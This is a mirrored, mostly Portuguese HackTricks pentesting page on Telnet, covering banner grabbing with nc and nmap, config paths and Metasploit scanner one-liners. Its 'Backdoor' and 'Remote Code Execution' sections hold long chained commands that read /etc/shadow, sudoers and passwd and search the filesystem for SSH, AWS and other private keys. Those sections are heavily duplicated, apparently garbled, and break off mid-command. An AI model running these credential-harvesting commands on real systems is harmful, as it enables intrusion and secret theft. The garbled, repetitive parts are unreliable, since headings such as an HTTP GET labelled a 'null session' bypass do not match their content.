Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-24 21:53:54 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-telnet.md

16 KiB
Raw Blame History

Informações Básicas

Telnet é um protocolo de rede que oferece aos usuários uma maneira INsegura de acessar um computador por meio de uma rede.

Porta padrão: 23

23/tcp open  telnet

Enumeração

Coleta de Banner

nc -vn <IP> 23

Toda a enumeração interessante pode ser realizada pelo nmap:

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

O script telnet-ntlm-info.nse obterá informações NTLM (versões do Windows).

No Protocolo TELNET, existem várias "opções" que serão sancionadas e podem ser usadas com a estrutura "DO, DON'T, WILL, WON'T" para permitir que um usuário e servidor concordem em usar um conjunto de convenções mais elaborado (ou talvez apenas diferente) para sua conexão TELNET. Essas opções podem incluir a alteração do conjunto de caracteres, o modo de eco, etc. (Do telnet RFC)
Eu sei que é possível enumerar essas opções, mas não sei como, então me avise se souber como.

Força bruta

Arquivo de configuração

/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet

Comandos Automáticos do HackTricks

Telnet

Banner Grabbing

Using Nmap
Usando Nmap
nmap -sV --script=banner -p <port> <ip>
Using Telnet
Usando Telnet
telnet <ip> <port>

Authentication Bypass

Null Session
Sessão Nula
telnet <ip> <port>

GET / HTTP/1.0
Backdoor
Backdoor
telnet <ip> <port>

id;uname -a;w;echo "Distributor ID: ";cat /etc/*-release;echo "";echo "Kernel: ";uname -a;echo "";echo "Uptime: ";uptime;echo "";echo "Processes: ";ps auxf --width 200;echo "";echo "Logged In: ";who;echo "";echo "Home Directories: ";ls -ahl /home;echo "";echo "Private SSH Keys: ";find / -name id_rsa* 2>/dev/null;echo "";echo "Sudoers: ";cat /etc/sudoers 2>/dev/null;echo "";echo "Cron Jobs: ";ls -ahl /etc/cron* 2>/dev/null;echo "";echo "Listening Ports: ";netstat -antup 2>/dev/null;echo "";echo "Established Connections: ";netstat -anp | grep ESTABLISHED 2>/dev/null;echo "";echo "ARP Cache: ";arp -a;echo "";echo "DNS Servers: ";cat /etc/resolv.conf;echo "";echo "Routing Table: ";route;echo "";echo "Firewall Rules: ";iptables -L;echo "";echo "Hostname: ";hostname;echo "";echo "Network Configuration: ";ifconfig -a;echo "";echo "Available Interfaces: ";ls /sys/class/net;echo "";echo "Default Route: ";ip route show;echo "";echo "All Users: ";cat /etc/passwd;echo "";echo "All Groups: ";cat /etc/group;echo "";echo "All Shells: ";cat /etc/shells;echo "";echo "All Services: ";ls /etc/init.d/;echo "";echo "All Applications: ";ls /usr/share/applications/;echo "";echo "All Binaries: ";ls /usr/bin/;echo "";echo "All SUID Binaries: ";find / -perm -4000 -type f 2>/dev/null;echo "";echo "All SGID Binaries: ";find / -perm -2000 -type f 2>/dev/null;echo "";echo "All World Writable Directories: ";find / -perm -2 -type d 2>/dev/null;echo "";echo "All World Writable Files: ";find / -perm -2 -type f 2>/dev/null;echo "";echo "All Files with Sticky Bit: ";find / -perm -1000 -type d 2>/dev/null;echo "";echo "All Files with Immutable Bit: ";lsattr -aR | grep "\i";echo "";echo "All Files with No Owner: ";find / -xdev \( -nouser -o -nogroup \) -print;echo "";echo "All Files with No Permissions: ";find / -xdev \( -type f -o -type d \) ! -perm /o=rwx -print;echo "";echo "All Files with SUID/SGID and World Writable: ";find / -perm -4007 -o -perm -2007 -type f -exec ls -la {} \; 2>/dev/null;echo "";echo "All Files with Hidden Attribute: ";find / -name ".*" -ls 2>/dev/null;echo "";echo "All Files with Passwords: ";grep -Rl password / 2>/dev/null;echo "";echo "All Files with Private Keys: ";grep -Rl "BEGIN RSA PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with AWS Keys: ";grep -Rl "AKIA" / 2>/dev/null;echo "";echo "All Files with Encryption Keys: ";grep -Rl "-----BEGIN ENCRYPTED PRIVATE KEY-----" / 2>/dev/null;echo "";echo "All Files with SSH Keys: ";grep -Rl "BEGIN OPENSSH PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL Certificates: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL Private Keys: ";grep -Rl "BEGIN RSA PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL PFX: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL JKS: ";grep -Rl "BEGIN JAVA KEYSTORE" / 2>/dev/null;echo "";echo "All Files with SSL PEM: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL DER: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CRT: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL KEY: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CER: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL P12: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL P7B: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";echo "All Files with SSL P7C: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";echo "All Files with SSL PFX: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL JKS: ";grep -Rl "BEGIN JAVA KEYSTORE" / 2>/dev/null;echo "";echo "All Files with SSL PEM: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL DER: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CRT: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL KEY: ";grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null;echo "";echo "All Files with SSL CER: ";grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null;echo "";echo "All Files with SSL P12: ";grep -Rl "BEGIN PKCS12" / 2>/dev/null;echo "";echo "All Files with SSL P7B: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";echo "All Files with SSL P7C: ";grep -Rl "BEGIN PKCS7" / 2>/dev/null;echo "";
Remote Code Execution
Execução Remota de Código
telnet <ip> <port>

;id

;uname -a

;cat /etc/passwd

;cat /etc/shadow

;ls -ahl /home

;ls -ahl /root

;find / -name *.bak -type f -exec cat {} \;

;find / -name *.log -type f -exec cat {} \;

;find / -name *.conf -type f -exec cat {} \;

;find / -name *.config -type f -exec cat {} \;

;find / -name *.db -type f -exec cat {} \;

;find / -name *.sql -type f -exec cat {} \;

;find / -name *.ini -type f -exec cat {} \;

;find / -name *.xml -type f -exec cat {} \;

;find / -name *.json -type f -exec cat {} \;

;find / -name *.yml -type f -exec cat {} \;

;find / -name *.yaml -type f -exec cat {} \;

;find / -name *.py -type f -exec cat {} \;

;find / -name *.php -type f -exec cat {} \;

;find / -name *.pl -type f -exec cat {} \;

;find / -name *.rb -type f -exec cat {} \;

;find / -name *.sh -type f -exec cat {} \;

;find / -name *.bash -type f -exec cat {} \;

;find / -name *.ps1 -type f -exec cat {} \;

;find / -name *.psm1 -type f -exec cat {} \;

;find / -name *.psd1 -type f -exec cat {} \;

;find / -name *.psc1 -type f -exec cat {} \;

;find / -name *.psc2 -type f -exec cat {} \;

;find / -name *.pyc -type f -exec cat {} \;

;find / -name *.pyo -type f -exec cat {} \;

;find / -name *.class -type f -exec cat {} \;

;find / -name *.jar -type f -exec cat {} \;

;find / -name *.war -type f -exec cat {} \;

;find / -name *.ear -type f -exec cat {} \;

;find / -name *.jsp -type f -exec cat {} \;

;find / -name *.jspx -type f -exec cat {} \;

;find / -name *.swf -type f -exec cat {} \;

;find / -name *.fla -type f -exec cat {} \;

;find / -name *.as -type f -exec cat {} \;

;find / -name *.aspx -type f -exec cat {} \;

;find / -name *.ascx -type f -exec cat {} \;

;find / -name *.config -type f -exec cat {} \;

;find / -name *.cs -type f -exec cat {} \;

;find / -name *.csproj -type f -exec cat {} \;

;find / -name *.vb -type f -exec cat {} \;

;find / -name *.vbproj -type f -exec cat {} \;

;find / -name *.java -type f -exec cat {} \;

;find / -name *.jsp -type f -exec cat {} \;

;find / -name *.jspx -type f -exec cat {} \;

;find / -name *.jspx -type f -exec cat {} \;

;find / -name *.jspx -type f -exec cat {} \;

;find / -name *.php -type f -exec cat {} \;

;find / -name *.php3 -type f -exec cat {} \;

;find / -name *.php4 -type f -exec cat {} \;

;find / -name *.php5 -type f -exec cat {} \;

;find / -name *.phtml -type f -exec cat {} \;

;find / -name *.inc -type f -exec cat {} \;

;find / -name *.pl -type f -exec cat {} \;

;find / -name *.pm -type f -exec cat {} \;

;find / -name *.cgi -type f -exec cat {} \;

;find / -name *.dll -type f -exec cat {} \;

;find / -name *.exe -type f -exec cat {} \;

;find / -name *.bat -type f -exec cat {} \;

;find / -name *.cmd -type f -exec cat {} \;

;find / -name *.vbs -type f -exec cat {} \;

;find / -name *.vbe -type f -exec cat {} \;

;find / -name *.js -type f -exec cat {} \;

;find / -name *.jse -type f -exec cat {} \;

;find / -name *.wsf -type f -exec cat {} \;

;find / -name *.wsc -type f -exec cat {} \;

;find / -name *.ps1 -type f -exec cat {} \;

;find / -name *.psm1 -type f -exec cat {} \;

;find / -name *.psd1 -type f -exec cat {} \;

;find / -name *.psc1 -type f -exec cat {} \;

;find / -name *.psc2 -type f -exec cat {} \;

;find / -name *.pyc -type f -exec cat {} \;

;find / -name *.pyo -type f -exec cat {} \;

;find / -name *.class -type f -exec cat {} \;

;find / -name *.jar -type f -exec cat {} \;

;find / -name *.war -type f -exec cat {} \;

;find / -name *.ear -type f -exec cat {} \;

;find / -name *.jsp -type f -exec cat {} \;

;find / -name *.jspx -type f -exec cat {} \;

;find / -name *.swf -type f -exec cat {} \;

;find / -name *.fla -type f -exec cat {} \;

;find / -name *.as -type f -exec cat {} \;

;find / -name *.aspx -type f -exec cat {} \;

;find / -name *.ascx -type f -exec cat {} \;

;find / -name *.config -type f -exec cat {} \;

;find / -name *.cs -type f -exec cat {} \;

;find / -name *.csproj -type f -exec cat {} \;

;find / -name *.vb -type f -exec cat {} \;

;find / -name *.vbproj -type f -exec cat {} \;

;find / -name *.java -type f -exec cat {} \;

;find / -name *.jsp -type f -exec cat {} \;

;find / -name *.jspx -type f -exec cat {} \;

;find / -name *.jspx -type f -exec cat {} \;

;find / -name *.jspx -type f -exec cat {} \;

;find / -name *.php -type f -exec cat {} \;

;find / -name *.php3 -type f -exec cat {} \;

;find / -name *.php4 -type f -exec cat {} \;

;find / -name *.php5 -type f -exec cat {} \;

;find / -name *.phtml -type f -exec cat {} \;

;find / -name *.inc -type f -exec cat {} \;

;find / -name *.pl -type f -exec cat {} \;

;find / -name *.pm -type f -exec cat {} \;

;find / -name *.cgi -type f -exec cat {} \;

;find / -name *.dll -type f -exec cat {} \;

;find / -name *.exe -type f -exec cat {} \;

;find / -name *.bat -type f -exec cat {} \;

;find / -name *.cmd -type f -exec cat {} \;

;find / -name *.vbs -

Protocol_Name: Telnet #Protocol Abbreviation if there is one. Port_Number: 23 #Comma separated if there is more than one. Protocol_Description: Telnet #Protocol Abbreviation Spelled out

Entry_1: Name: Notes Description: Notes for t=Telnet Note: | wireshark to hear creds being passed tcp.port == 23 and ip.addr != myip

https://book.hacktricks.xyz/pentesting/pentesting-telnet

Entry_2: Name: Banner Grab Description: Grab Telnet Banner Command: nc -vn {IP} 23

Entry_3: Name: Nmap with scripts Description: Run nmap scripts for telnet Command: nmap -n -sV -Pn --script "telnet" -p 23 {IP}

Entry_4: Name: consoleless mfs enumeration Description: Telnet enumeration without the need to run msfconsole Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>

[**A Conferência de Segurança DragonJAR é um evento internacional de cibersegurança**](https://www.dragonjarcon.org/) com mais de uma década de existência que será realizada nos dias 7 e 8 de setembro de 2023 em Bogotá, Colômbia. É um evento com grande conteúdo técnico onde são apresentadas as últimas pesquisas em espanhol que atraem hackers e pesquisadores de todo o mundo.\
Registre-se agora no seguinte link e não perca esta grande conferência!:

{% embed url="https://www.dragonjarcon.org/" %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>